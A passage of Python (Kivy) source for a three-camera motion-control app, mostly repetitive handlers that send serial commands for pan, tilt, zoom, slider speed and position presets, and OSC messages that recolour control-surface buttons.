client.send_message("/style/bgcolor/3/21", [70, 62, 1])
client.send_message("/style/color/3/21", [0, 0, 0])
client.send_message("/style/bgcolor/6/5", [70, 62, 1])
client.send_message("/style/color/6/5", [0, 0, 0])
if cam3Pos6Set != OLDcam3Pos6Set or cam3Pos6Run != OLDcam3Pos6Run or cam3AtPos6 != OLDcam3AtPos6 or resetButtons:
OLDcam3Pos6Set = cam3Pos6Set
OLDcam3Pos6Run = cam3Pos6Run
OLDcam3AtPos6 = cam3AtPos6
if cam3Pos6Set and not cam3Pos6Run and not cam3AtPos6: # Position LEDs Cam3
self.root.ids.btnCam3Go6.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/22", [70, 62, 1])
client.send_message("/style/color/3/22", [255, 0, 0])
client.send_message("/style/bgcolor/6/6", [70, 62, 1])
client.send_message("/style/color/6/6", [255, 0, 0])
elif cam3Pos6Set and not cam3Pos6Run and cam3AtPos6:
self.root.ids.btnCam3Go6.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/22", [186, 164, 1])
client.send_message("/style/color/3/22", [255, 255, 255])
client.send_message("/style/bgcolor/6/6", [186, 164, 1])
client.send_message("/style/color/6/6", [255, 255, 255])
elif not cam3Pos6Set:
self.root.ids.btnCam3Go6.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/22", [70, 62, 1])
client.send_message("/style/color/3/22", [0, 0, 0])
client.send_message("/style/bgcolor/6/6", [70, 62, 1])
client.send_message("/style/color/6/6", [0, 0, 0])
if oldCam1PTSpeed != cam1PTSpeed:
oldCam1PTSpeed = cam1PTSpeed
client.send_message("/style/text/3/7", "-")
if cam1PTSpeed == 1:
self.root.ids.cam1PTSpd.sizPT1=((xDivSet*2.25), (yDivSet*6))
client.send_message("/style/text/3/8", "+ 1/4")
client.send_message("/style/text/4/10", "Spd 1/4")
elif cam1PTSpeed == 3:
self.root.ids.cam1PTSpd.sizPT1=((xDivSet*4.5), (yDivSet*6))
client.send_message("/style/text/3/8", "+ 2/4")
client.send_message("/style/text/4/10", "Spd 2/4")
elif cam1PTSpeed == 5:
self.root.ids.cam1PTSpd.sizPT1=((xDivSet*6.75), (yDivSet*6))
client.send_message("/style/text/3/8", "+ 3/4")
client.send_message("/style/text/4/10", "Spd 3/4")
elif cam1PTSpeed == 7:
self.root.ids.cam1PTSpd.sizPT1=((xDivSet*9), (yDivSet*6))
client.send_message("/style/text/3/8", "+ 4/4")
client.send_message("/style/text/4/10", "Spd 4/4")
if oldCam2PTSpeed != cam2PTSpeed:
oldCam2PTSpeed = cam2PTSpeed
client.send_message("/style/text/3/15", "-")
if cam2PTSpeed == 1:
self.root.ids.cam2PTSpd.sizPT2=((xDivSet*2.25), (yDivSet*6))
client.send_message("/style/text/3/16", "+ 1/4")
client.send_message("/style/text/5/10", "Spd 1/4")
elif cam2PTSpeed == 3:
self.root.ids.cam2PTSpd.sizPT2=((xDivSet*4.5), (yDivSet*6))
client.send_message("/style/text/3/16", "+ 2/4")
client.send_message("/style/text/5/10", "Spd 2/4")
elif cam2PTSpeed == 5:
self.root.ids.cam2PTSpd.sizPT2=((xDivSet*6.75), (yDivSet*6))
client.send_message("/style/text/3/16", "+ 3/4")
client.send_message("/style/text/5/10", "Spd 3/4")
elif cam2PTSpeed == 7:
self.root.ids.cam2PTSpd.sizPT2=((xDivSet*9), (yDivSet*6))
client.send_message("/style/text/3/16", "+ 4/4")
client.send_message("/style/text/5/10", "Spd 4/4")
if oldCam3PTSpeed != cam3PTSpeed:
oldCam3PTSpeed = cam3PTSpeed
client.send_message("/style/text/3/23", "-")
if cam3PTSpeed == 1:
self.root.ids.cam3PTSpd.sizPT3=((xDivSet*2.25), (yDivSet*6))
client.send_message("/style/text/3/24", "+ 1/4")
client.send_message("/style/text/6/10", "Spd 1/4")
elif cam3PTSpeed == 3:
self.root.ids.cam3PTSpd.sizPT3=((xDivSet*4.5), (yDivSet*6))
client.send_message("/style/text/3/16", "+ 2/4")
client.send_message("/style/text/6/10", "Spd 2/4")
elif cam3PTSpeed == 5:
self.root.ids.cam3PTSpd.sizPT3=((xDivSet*6.75), (yDivSet*6))
client.send_message("/style/text/3/16", "+ 3/4")
client.send_message("/style/text/6/10", "Spd 3/4")
elif cam3PTSpeed == 7:
self.root.ids.cam3PTSpd.sizPT3=((xDivSet*9), (yDivSet*6))
client.send_message("/style/text/3/16", "+ 4/4")
client.send_message("/style/text/6/10", "Spd 4/4")
if oldCam1Speed != cam1SliderSpeed:
oldCam1Speed = cam1SliderSpeed
if cam1SliderSpeed == 1:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*1.29), (yDivSet*6))
elif cam1SliderSpeed == 2:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*2.57), (yDivSet*6))
elif cam1SliderSpeed == 3:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*3.86), (yDivSet*6))
elif cam1SliderSpeed == 4:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*5.14), (yDivSet*6))
elif cam1SliderSpeed == 5:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*6.43), (yDivSet*6))
elif cam1SliderSpeed == 6:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*7.71), (yDivSet*6))
elif cam1SliderSpeed == 7:
self.root.ids.cam1SlSpd.sizSl1=((xDivSet*9), (yDivSet*6))
if oldCam2Speed != cam2SliderSpeed:
oldCam2Speed = cam2SliderSpeed
if cam2SliderSpeed == 1:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*1.29), (yDivSet*6))
elif cam2SliderSpeed == 2:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*2.57), (yDivSet*6))
elif cam2SliderSpeed == 3:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*3.86), (yDivSet*6))
elif cam2SliderSpeed == 4:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*5.14), (yDivSet*6))
elif cam2SliderSpeed == 5:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*6.43), (yDivSet*6))
elif cam2SliderSpeed == 6:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*7.71), (yDivSet*6))
elif cam2SliderSpeed == 7:
self.root.ids.cam2SlSpd.sizSl2=((xDivSet*9), (yDivSet*6))
if oldCam3Speed != cam3SliderSpeed:
oldCam3Speed = cam3SliderSpeed
if cam3SliderSpeed == 1:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*1.29), (yDivSet*6))
elif cam3SliderSpeed == 2:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*2.57), (yDivSet*6))
elif cam3SliderSpeed == 3:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*3.86), (yDivSet*6))
elif cam3SliderSpeed == 4:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*5.14), (yDivSet*6))
elif cam3SliderSpeed == 5:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*6.43), (yDivSet*6))
elif cam3SliderSpeed == 6:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*7.71), (yDivSet*6))
elif cam3SliderSpeed == 7:
self.root.ids.cam3SlSpd.sizSl3=((xDivSet*9), (yDivSet*6))
resetButtons = False
def whichCamSerial1(self):
global whichCamSerial
whichCamSerial = 1
self.root.ids.buttonWhichCam1.line_color=(1, 0, 0, 1)
self.root.ids.buttonWhichCam2.line_color=(.13, .13, .13, 1)
self.root.ids.buttonWhichCam3.line_color=(.13, .13, .13, 1)
def whichCamSerial2(self):
global whichCamSerial
whichCamSerial = 2
self.root.ids.buttonWhichCam1.line_color=(.13, .13, .13, 1)
self.root.ids.buttonWhichCam2.line_color=(1, 0, 0, 1)
self.root.ids.buttonWhichCam3.line_color=(.13, .13, .13, 1)
def whichCamSerial3(self):
global whichCamSerial
whichCamSerial = 3
self.root.ids.buttonWhichCam1.line_color=(.13, .13, .13, 1)
self.root.ids.buttonWhichCam2.line_color=(.13, .13, .13, 1)
self.root.ids.buttonWhichCam3.line_color=(1, 0, 0, 1)
def joyL10(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??P-10')
elif whichCamSerial == 2:
self.sendSerial('!?P-10')
elif whichCamSerial == 3:
self.sendSerial('@?P-10')
def joyL1(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??P-0.5')
elif whichCamSerial == 2:
self.sendSerial('!?P-0.5')
elif whichCamSerial == 3:
self.sendSerial('@?P-0.5')
def joyR1(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??P0.5')
elif whichCamSerial == 2:
self.sendSerial('!?P0.5')
elif whichCamSerial == 3:
self.sendSerial('@?P0.5')
def joyR10(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??P10')
elif whichCamSerial == 2:
self.sendSerial('!?P10')
elif whichCamSerial == 3:
self.sendSerial('@?P10')
def joyU10(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??T10')
elif whichCamSerial == 2:
self.sendSerial('!?T10')
elif whichCamSerial == 3:
self.sendSerial('@?T10')
def joyU1(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??T0.5')
elif whichCamSerial == 2:
self.sendSerial('!?T0.5')
elif whichCamSerial == 3:
self.sendSerial('@?T0.5')
def joyD1(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??T-0.5')
elif whichCamSerial == 2:
self.sendSerial('!?T-0.5')
elif whichCamSerial == 3:
self.sendSerial('@?T-0.5')
def joyD10(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??T-10')
elif whichCamSerial == 2:
self.sendSerial('!?T-10')
elif whichCamSerial == 3:
self.sendSerial('@?T-10')
def joySL100(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??X-100')
elif whichCamSerial == 2:
self.sendSerial('!?X-100')
elif whichCamSerial == 3:
self.sendSerial('@?X-100')
def joySL10(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??X-10')
elif whichCamSerial == 2:
self.sendSerial('!?X-10')
elif whichCamSerial == 3:
self.sendSerial('@?X-10')
def joySR10(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??X10')
elif whichCamSerial == 2:
self.sendSerial('!?X10')
elif whichCamSerial == 3:
self.sendSerial('@?X10')
def joySR100(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('??X100')
elif whichCamSerial == 2:
self.sendSerial('!?X100')
elif whichCamSerial == 3:
self.sendSerial('@?X100')
def joyL10OSC(self, cam):
if cam == 1:
self.sendSerial('??P-10')
elif cam == 2:
self.sendSerial('!?P-10')
elif cam == 3:
self.sendSerial('@?P-10')
def joyL1OSC(self, cam):
if cam == 1:
self.sendSerial('??P-0.1')
elif cam == 2:
self.sendSerial('!?P-0.1')
elif cam == 3:
self.sendSerial('@?P-0.1')
def joyR1OSC(self, cam):
if cam == 1:
self.sendSerial('??P0.1')
elif cam == 2:
self.sendSerial('!?P0.1')
elif cam == 3:
self.sendSerial('@?P0.1')
def joyR10OSC(self, cam):
if cam == 1:
self.sendSerial('??P10')
elif cam == 2:
self.sendSerial('!?P10')
elif cam == 3:
self.sendSerial('@?P10')
def joyU10OSC(self, cam):
if cam == 1:
self.sendSerial('??T10')
elif cam == 2:
self.sendSerial('!?T10')
elif cam == 3:
self.sendSerial('@?T10')
def joyU1OSC(self, cam):
if cam == 1:
self.sendSerial('??T0.1')
elif cam == 2:
self.sendSerial('!?T0.1')
elif cam == 3:
self.sendSerial('@?T0.1')
def joyD1OSC(self, cam):
if cam == 1:
self.sendSerial('??T-0.1')
elif cam == 2:
self.sendSerial('!?T-0.1')
elif cam == 3:
self.sendSerial('@?T-0.1')
def joyD10OSC(self, cam):
if cam == 1:
self.sendSerial('??T-10')
elif cam == 2:
self.sendSerial('!?T-10')
elif cam == 3:
self.sendSerial('@?T-10')
def joySL100OSC(self, cam):
if cam == 1:
self.sendSerial('??X-100')
elif cam == 2:
self.sendSerial('!?X-100')
elif cam == 3:
self.sendSerial('@?X-100')
def joySL10OSC(self, cam):
if cam == 1:
self.sendSerial('??X-10')
elif cam == 2:
self.sendSerial('!?X-10')
elif cam == 3:
self.sendSerial('@?X-10')
def joySR10OSC(self, cam):
if cam == 1:
self.sendSerial('??X10')
elif cam == 2:
self.sendSerial('!?X10')
elif cam == 3:
self.sendSerial('@?X10')
def joySR100OSC(self, cam):
if cam == 1:
self.sendSerial('??X100')
elif cam == 2:
self.sendSerial('!?X100')
elif cam == 3:
self.sendSerial('@?X100')
def Cam1Go1(self):
global SetPosToggle
global cam1Pos1Set
global cam1AtPos1
if SetPosToggle:
self.setPos(3)
self.sendSerial('&Z')
return
elif cam1Pos1Set and not cam1AtPos1:
self.sendSerial('&z')
def Cam1Go2(self):
global SetPosToggle
global cam1Pos2Set
global cam1AtPos2
if SetPosToggle:
self.setPos(3)
self.sendSerial('&X')
return
elif cam1Pos2Set and not cam1AtPos2:
self.sendSerial('&x')
def Cam1Go3(self):
global SetPosToggle
global cam1Pos3Set
global cam1AtPos3
if SetPosToggle:
self.setPos(3)
self.sendSerial('&C')
return
elif cam1Pos3Set and not cam1AtPos3:
self.sendSerial('&c')
def Cam1Go4(self):
global SetPosToggle
global cam1Pos4Set
global cam1AtPos4
if SetPosToggle:
self.setPos(3)
self.sendSerial('&V')
return
elif cam1Pos4Set and not cam1AtPos4:
self.sendSerial('&v')
def Cam1Go5(self):
global SetPosToggle
global cam1Pos5Set
global cam1AtPos5
if SetPosToggle:
self.setPos(3)
self.sendSerial('&B')
return
elif cam1Pos5Set and not cam1AtPos5:
self.sendSerial('&b')
def Cam1Go6(self):
global SetPosToggle
global cam1Pos6Set
global cam1AtPos6
if SetPosToggle:
self.setPos(3)
self.sendSerial('&N')
return
elif cam1Pos6Set and not cam1AtPos6:
self.sendSerial('&n')
def Cam2Go1(self):
global SetPosToggle
global cam2Pos1Set
global cam2AtPos1
if SetPosToggle:
self.setPos(3)
self.sendSerial('&A')
return
elif cam2Pos1Set and not cam2AtPos1:
self.sendSerial('&a')
def Cam2Go2(self):
global SetPosToggle
global cam2Pos2Set
global cam2AtPos2
if SetPosToggle:
self.setPos(3)
self.sendSerial('&S')
return
elif cam2Pos2Set and not cam2AtPos2:
self.sendSerial('&s')
def Cam2Go3(self):
global SetPosToggle
global cam2Pos3Set
global cam2AtPos3
if SetPosToggle:
self.setPos(3)
self.sendSerial('&D')
return
elif cam2Pos3Set and not cam2AtPos3:
self.sendSerial('&d')
def Cam2Go4(self):
global SetPosToggle
global cam2Pos4Set
global cam2AtPos4
if SetPosToggle:
self.setPos(3)
self.sendSerial('&F')
return
elif cam2Pos4Set and not cam2AtPos4:
self.sendSerial('&f')
def Cam2Go5(self):
global SetPosToggle
global cam2Pos5Set
global cam2AtPos5
if SetPosToggle:
self.setPos(3)
self.sendSerial('&G')
return
elif cam2Pos5Set and not cam2AtPos5:
self.sendSerial('&g')
def Cam2Go6(self):
global SetPosToggle
global cam2Pos6Set
global cam2AtPos6
if SetPosToggle:
self.setPos(3)
self.sendSerial('&H')
return
elif cam2Pos6Set and not cam2AtPos6:
self.sendSerial('&h')
def Cam3Go1(self):
global SetPosToggle
global cam3Pos1Set
global cam3AtPos1
if SetPosToggle:
self.setPos(3)
self.sendSerial('&Q')
return
elif cam3Pos1Set and not cam3AtPos1:
self.sendSerial('&q')
def Cam3Go2(self):
global SetPosToggle
global cam3Pos2Set
global cam3AtPos2
if SetPosToggle:
self.setPos(3)
self.sendSerial('&W')
return
elif cam3Pos2Set and not cam3AtPos2:
self.sendSerial('&w')
def Cam3Go3(self):
global SetPosToggle
global cam3Pos3Set
global cam3AtPos3
if SetPosToggle:
self.setPos(3)
self.sendSerial('&E')
return
elif cam3Pos3Set and not cam3AtPos3:
self.sendSerial('&e')
def Cam3Go4(self):
global SetPosToggle
global cam3Pos4Set
global cam3AtPos4
if SetPosToggle:
self.setPos(3)
self.sendSerial('&R')
return
elif cam3Pos4Set and not cam3AtPos4:
self.sendSerial('&r')
def Cam3Go5(self):
global SetPosToggle
global cam3Pos5Set
global cam3AtPos5
if SetPosToggle:
self.setPos(3)
self.sendSerial('&T')
return
elif cam3Pos5Set and not cam3AtPos5:
self.sendSerial('&t')
def Cam3Go6(self):
global SetPosToggle
global cam3Pos6Set
global cam3AtPos6
if SetPosToggle:
self.setPos(3)
self.sendSerial('&Y')
return
elif cam3Pos6Set and not cam3AtPos6:
self.sendSerial('&y')
def sendCam1PTSpeedInc(self):
global cam1PTSpeed
if cam1PTSpeed == 1:
self.sendSerial('&+13')
elif cam1PTSpeed == 3:
self.sendSerial('&+12')
elif cam1PTSpeed == 5:
self.sendSerial('&+11')
elif cam1PTSpeed == 7:
return
def sendCam1PTSpeedDec(self):
global cam1PTSpeed
if cam1PTSpeed == 7:
self.sendSerial('&+12')
elif cam1PTSpeed == 5:
self.sendSerial('&+13')
elif cam1PTSpeed == 3:
self.sendSerial('&+14')
elif cam1PTSpeed == 1:
return
def sendCam2PTSpeedInc(self):
global cam2PTSpeed
if cam2PTSpeed == 1:
self.sendSerial('&+23')
elif cam2PTSpeed == 3:
self.sendSerial('&+22')
elif cam2PTSpeed == 5:
self.sendSerial('&+21')
elif cam2PTSpeed == 7:
return
def sendCam2PTSpeedDec(self):
global cam2PTSpeed
if cam2PTSpeed == 7:
self.sendSerial('&+22')
elif cam2PTSpeed == 5:
self.sendSerial('&+23')
elif cam2PTSpeed == 3:
self.sendSerial('&+24')
elif cam2PTSpeed == 1:
return
def sendCam3PTSpeedInc(self):
global cam3PTSpeed
if cam3PTSpeed == 1:
self.sendSerial('&+33')
elif cam3PTSpeed == 3:
self.sendSerial('&+32')
elif cam3PTSpeed == 5:
self.sendSerial('&+31')
elif cam3PTSpeed == 7:
return
def sendCam3PTSpeedDec(self):
global cam3PTSpeed
if cam3PTSpeed == 7:
self.sendSerial('&+32')
elif cam3PTSpeed == 5:
self.sendSerial('&+33')
elif cam3PTSpeed == 3:
self.sendSerial('&+34')
elif cam3PTSpeed == 1:
return
def sendCam2PTSpeedOSC(self, OSC):
#print(OSC)
if OSC == 0:
self.sendSerial('&+24')
elif OSC == 1:
self.sendSerial('&+23')
elif OSC == 2:
self.sendSerial('&+22')
elif OSC == 3:
self.sendSerial('&+21')
def sendCam1SliderSpeedInc(self):
self.sendSerial('&M')
def sendCam1SliderSpeedDec(self):
self.sendSerial('&m')
def sendCam2SliderSpeedInc(self):
self.sendSerial('&J')
def sendCam2SliderSpeedDec(self):
self.sendSerial('&j')
def sendCam3SliderSpeedInc(self):
self.sendSerial('&U')
def sendCam3SliderSpeedDec(self):
self.sendSerial('&u')
def sendCam1ZoomIn(self):
global cam1isZooming
cam1isZooming = True
self.sendSerial('&<')
def sendCam1ZoomOut(self):
global cam1isZooming
cam1isZooming = True
self.sendSerial('&,')
def sendCam1ZoomStop(self):
global cam1isZooming
cam1isZooming = False
self.sendSerial('&>')
def sendCam2ZoomIn(self):
global cam2isZooming
cam2isZooming = True
self.sendSerial('&K')
def sendCam2ZoomOut(self):
global cam2isZooming
cam2isZooming = True
self.sendSerial('&k')
def sendCam2ZoomStop(self):
global cam2isZooming
cam2isZooming = False
self.sendSerial('&L')
def sendCam3ZoomIn(self):
global cam3isZooming
cam3isZooming = True
self.sendSerial('&I')
def sendCam3ZoomOut(self):
global cam3isZooming
cam3isZooming = True
self.sendSerial('&i')
def sendCam3ZoomStop(self):
global cam3isZooming
cam3isZooming = False
self.sendSerial('&O')
def sendClearCam1Pos(self):
self.sendSerial('&%')
def sendClearCam2Pos(self):
self.sendSerial('&^')
def sendClearCam3Pos(self):
self.sendSerial('&&')
def flash(self, dt):
global cam1Pos1Run
global cam1Pos2Run
global cam1Pos3Run
global cam1Pos4Run
global cam1Pos5Run
global cam1Pos6Run
global cam2Pos1Run
global cam2Pos2Run
global cam2Pos3Run
global cam2Pos4Run
global cam2Pos5Run
global cam2Pos6Run
global cam3Pos1Run
global cam3Pos2Run
global cam3Pos3Run
global cam3Pos4Run
global cam3Pos5Run
global cam3Pos6Run
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam3AtPos1
global cam3AtPos2
global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
if cam1Pos1Run and not cam1AtPos1:
self.root.ids.btnCam1Go1.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/1", [48, 186, 49])
client.send_message("/style/color/3/1", [200, 200, 0])
client.send_message("/style/bgcolor/4/1", [48, 186, 49])
client.send_message("/style/color/4/1", [200, 200, 0])
if cam1Pos2Run and not cam1AtPos2:
self.root.ids.btnCam1Go2.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/2", [48, 186, 49])
client.send_message("/style/color/3/2", [200, 200, 0])
client.send_message("/style/bgcolor/4/2", [48, 186, 49])
client.send_message("/style/color/4/2", [200, 200, 0])
if cam1Pos3Run and not cam1AtPos3:
self.root.ids.btnCam1Go3.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/3", [48, 186, 49])
client.send_message("/style/color/3/3", [200, 200, 0])
client.send_message("/style/bgcolor/4/3", [48, 186, 49])
client.send_message("/style/color/4/3", [200, 200, 0])
if cam1Pos4Run and not cam1AtPos4:
self.root.ids.btnCam1Go4.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/4", [48, 186, 49])
client.send_message("/style/color/3/4", [200, 200, 0])
client.send_message("/style/bgcolor/4/4", [48, 186, 49])
client.send_message("/style/color/4/4", [200, 200, 0])
if cam1Pos5Run and not cam1AtPos5:
self.root.ids.btnCam1Go5.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/5", [48, 186, 49])
client.send_message("/style/color/3/5", [200, 200, 0])
client.send_message("/style/bgcolor/4/5", [48, 186, 49])
client.send_message("/style/color/4/5", [200, 200, 0])
if cam1Pos6Run and not cam1AtPos6:
self.root.ids.btnCam1Go6.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/6", [48, 186, 49])
client.send_message("/style/color/3/6", [200, 200, 0])
client.send_message("/style/bgcolor/4/6", [48, 186, 49])
client.send_message("/style/color/4/6", [200, 200, 0])
if cam2Pos1Run and not cam2AtPos1:
self.root.ids.btnCam2Go1.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/9", [92, 133, 186])
client.send_message("/style/color/3/9", [200, 200, 0])
client.send_message("/style/bgcolor/5/1", [92, 133, 186])
client.send_message("/style/color/5/1", [200, 200, 0])
#client.send_message("/Cam1Go1", [1, "AAAA00FF"])
if cam2Pos2Run and not cam2AtPos2:
self.root.ids.btnCam2Go2.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/10", [92, 133, 186])
client.send_message("/style/color/3/10", [200, 200, 0])
client.send_message("/style/bgcolor/5/2", [92, 133, 186])
client.send_message("/style/color/5/2", [200, 200, 0])
if cam2Pos3Run and not cam2AtPos3:
self.root.ids.btnCam2Go3.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/11", [92, 133, 186])
client.send_message("/style/color/3/11", [200, 200, 0])
client.send_message("/style/bgcolor/5/3", [92, 133, 186])
client.send_message("/style/color/5/3", [200, 200, 0])
if cam2Pos4Run and not cam2AtPos4:
self.root.ids.btnCam2Go4.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/12", [92, 133, 186])
client.send_message("/style/color/3/12", [200, 200, 0])
client.send_message("/style/bgcolor/5/4", [92, 133, 186])
client.send_message("/style/color/5/4", [200, 200, 0])
if cam2Pos5Run and not cam2AtPos5:
self.root.ids.btnCam2Go5.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/13", [92, 133, 186])
client.send_message("/style/color/3/13", [200, 200, 0])
client.send_message("/style/bgcolor/5/5", [92, 133, 186])
client.send_message("/style/color/5/5", [200, 200, 0])
if cam2Pos6Run and not cam2AtPos6:
self.root.ids.btnCam2Go6.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/14", [92, 133, 186])
client.send_message("/style/color/3/14", [200, 200, 0])
client.send_message("/style/bgcolor/5/6", [92, 133, 186])
client.send_message("/style/color/5/6", [200, 200, 0])
if cam3Pos1Run and not cam3AtPos1:
self.root.ids.btnCam3Go1.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/17", [186, 164, 1])
client.send_message("/style/color/3/17", [200, 200, 0])
client.send_message("/style/bgcolor/6/1", [186, 164, 1])
client.send_message("/style/color/6/1", [200, 200, 0])
if cam3Pos2Run and not cam3AtPos2:
self.root.ids.btnCam3Go2.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/18", [186, 164, 1])
client.send_message("/style/color/3/18", [200, 200, 0])
client.send_message("/style/bgcolor/6/2", [186, 164, 1])
client.send_message("/style/color/6/2", [200, 200, 0])
if cam3Pos3Run and not cam3AtPos3:
self.root.ids.btnCam3Go3.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/19", [186, 164, 1])
client.send_message("/style/color/3/19", [200, 200, 0])
client.send_message("/style/bgcolor/6/3", [186, 164, 1])
client.send_message("/style/color/6/3", [200, 200, 0])
if cam3Pos4Run and not cam3AtPos4:
self.root.ids.btnCam3Go4.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/20", [186, 164, 1])
client.send_message("/style/color/3/20", [200, 200, 0])
client.send_message("/style/bgcolor/6/4", [186, 164, 1])
client.send_message("/style/color/6/4", [200, 200, 0])
if cam3Pos5Run and not cam3AtPos5:
self.root.ids.btnCam3Go5.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/21", [186, 164, 1])
client.send_message("/style/color/3/21", [200, 200, 0])
client.send_message("/style/bgcolor/6/5", [186, 164, 1])
client.send_message("/style/color/6/5", [200, 200, 0])
if cam3Pos6Run and not cam3AtPos6:
self.root.ids.btnCam3Go6.col=(1, 1, 0, 1)
client.send_message("/style/bgcolor/3/22", [186, 164, 1])
client.send_message("/style/color/3/22", [200, 200, 0])
client.send_message("/style/bgcolor/6/6", [186, 164, 1])
client.send_message("/style/color/6/6", [200, 200, 0])
Clock.schedule_once(self.setNormal, 0.5)
def setNormal(self, dt):
global cam1Pos1Run
global cam1Pos2Run
global cam1Pos3Run
global cam1Pos4Run
global cam1Pos5Run
global cam1Pos6Run
global cam2Pos1Run
global cam2Pos2Run
global cam2Pos3Run
global cam2Pos4Run
global cam2Pos5Run
global cam2Pos6Run
global cam3Pos1Run
global cam3Pos2Run
global cam3Pos3Run
global cam3Pos4Run
global cam3Pos5Run
global cam3Pos6Run
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam3AtPos1
global cam3AtPos2
global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
if cam1Pos1Run and not cam1AtPos1:
self.root.ids.btnCam1Go1.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/1", [18, 70, 19])
client.send_message("/style/color/3/1", [50, 50, 0])
client.send_message("/style/bgcolor/4/1", [18, 70, 19])
client.send_message("/style/color/4/1", [50, 50, 0])
if cam1Pos2Run and not cam1AtPos2:
self.root.ids.btnCam1Go2.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/2", [18, 70, 19])
client.send_message("/style/color/3/2", [50, 50, 0])
client.send_message("/style/bgcolor/4/2", [18, 70, 19])
client.send_message("/style/color/4/2", [50, 50, 0])
if cam1Pos3Run and not cam1AtPos3:
self.root.ids.btnCam1Go3.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/3", [18, 70, 19])
client.send_message("/style/color/3/3", [50, 50, 0])
client.send_message("/style/bgcolor/4/3", [18, 70, 19])
client.send_message("/style/color/4/3", [50, 50, 0])
if cam1Pos4Run and not cam1AtPos4:
self.root.ids.btnCam1Go4.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/4", [18, 70, 19])
client.send_message("/style/color/3/4", [50, 50, 0])
client.send_message("/style/bgcolor/4/4", [18, 70, 19])
client.send_message("/style/color/4/4", [50, 50, 0])
if cam1Pos5Run and not cam1AtPos5:
self.root.ids.btnCam1Go5.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/5", [18, 70, 19])
client.send_message("/style/color/3/5", [50, 50, 0])
client.send_message("/style/bgcolor/4/5", [18, 70, 19])
client.send_message("/style/color/4/5", [50, 50, 0])
if cam1Pos6Run and not cam1AtPos6:
self.root.ids.btnCam1Go6.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/6", [18, 70, 19])
client.send_message("/style/color/3/6", [50, 50, 0])
client.send_message("/style/bgcolor/4/6", [18, 70, 19])
client.send_message("/style/color/4/6", [50, 50, 0])
if cam2Pos1Run and not cam2AtPos1:
self.root.ids.btnCam2Go1.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/9", [35, 50, 70])
client.send_message("/style/color/3/9", [50, 50, 0])
client.send_message("/style/bgcolor/5/1", [35, 50, 70])
client.send_message("/style/color/5/1", [50, 50, 0])
#client.send_message("/Cam1Go1", [1, "000000FF"])
if cam2Pos2Run and not cam2AtPos2:
self.root.ids.btnCam2Go2.col=(.1, .1, .1, 1)
client.send_message("/style/bgcolor/3/10", [35, 50, 70])
client.send_message("/style/color/3/10", [50, 50, 0])
client.send_message("/style/bgcolor/5/2", [35, 50, 70])
client.send_message("/style/color/5/2", [50, 50, 0])
if cam2Pos3Run and not cam2AtPos3:
